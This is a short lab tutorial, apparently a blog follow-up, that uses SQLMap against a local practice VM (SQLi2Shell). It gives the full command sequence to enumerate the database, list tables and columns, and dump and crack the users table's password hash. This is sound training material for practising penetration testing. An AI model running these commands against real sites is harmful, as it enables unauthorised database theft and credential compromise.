Hey everyone! This is a follow-up to the SQLi to Shell – Manual Injection tutorial. In this tutorial, I’m going to show how to use SQLMap to perform the same injection attack. I won’t be going through the entire challenge again of discovery, exploiting SQLi, and getting shell. I just want to focus on the SQL injection part, and show how much faster it can be when using a tool like SQLMap. Let’s go!
If you don’t have it running already, go ahead and fire up your SQLi2Shell machine, and make sure you have Kali running as well. In Kali, open a terminal window. This is where we’ll be typing our sqlmap commands.
We know my vulnerable URL was “http://192.168.1.187/cat.php?id=1“, so we’re going to use that in sqlmap.
We’ll start out again getting some basic info about the database. Let’s get the current database name, and the current database user.
Command: sqlmap -u http://192.168.1.187/cat.php?id=1 –dbms=mysql –current-user –current-db
So we have that info, and notice how quickly SQLMap returned the data.
Next, we’ll get the table names.
Command: sqlmap -u http://192.168.1.187/cat.php?id=1 –dbms=mysql –tables
We’re going to focus on the “users” table.
Now we want to get the column names for the “users” table.
Command: sqlmap -u http://192.168.1.187/cat.php?id=1 –dbms=mysql -T users –columns
Extract the Data
Now that we have the column names, we need to dump all the data that’s available.
Command: sqlmap -u http://192.168.1.187/cat.php?id=1 –dbms=mysql -T users -C login,password –dump
Perfect! Now we have the username, and password hash, and sqlmap was able to crack the password for us, so the password is “P4ssw0rd”.
You can now take this information, login to the Admin page, and continue with getting your shell on the box.
That will do it for this one. I know this was a short one, but I wanted to show how simple, and fast SQLMap is to use. You still need to know how to perform the attack manually, and once you get that down, feel free to bring SQLMap into the mix to get the job done faster!
Thanks for checking it out!